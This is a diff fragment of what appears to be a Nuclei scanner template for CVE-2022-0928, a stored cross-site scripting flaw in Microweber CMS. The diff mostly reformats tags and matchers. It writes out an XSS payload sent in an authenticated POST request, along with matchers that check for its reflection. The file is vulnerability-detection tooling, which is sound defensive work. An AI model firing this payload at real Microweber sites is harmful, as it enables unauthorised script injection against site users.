severity: medium
description: |
@ -16,8 +16,8 @@ info:
cve-id: CVE-2022-0928
cwe-id: CWE-79
metadata:
verified: "true"
tags: authenticated,huntr,cve,cve2022,xss,microweber,cms
verified: true
tags: cve,cve2022,authenticated,huntr,xss,microweber,cms
requests:
- raw:
@ -36,7 +36,7 @@ requests:
id=0&name=vat1&type="><img+src%3dx+onerror%3dalert(document.domain)>&rate=10
- |-
- |
POST /module HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
@ -49,9 +49,9 @@ requests:
matchers:
- type: dsl
dsl:
- contains(body_3,'<td>\"><img src=x onerror=alert(document.domain)></td>')
- 'contains(body_3,"<img src=x onerror=alert(document.domain)></td>")'
- 'contains(all_headers_3,"text/html")'
- 'status_code==200'
- 'status_code_2 == 200 && status_code_3 == 200'
condition: and
# Enhanced by mp on 2022/09/14

Some files were not shown because too many files have changed in this diff Show More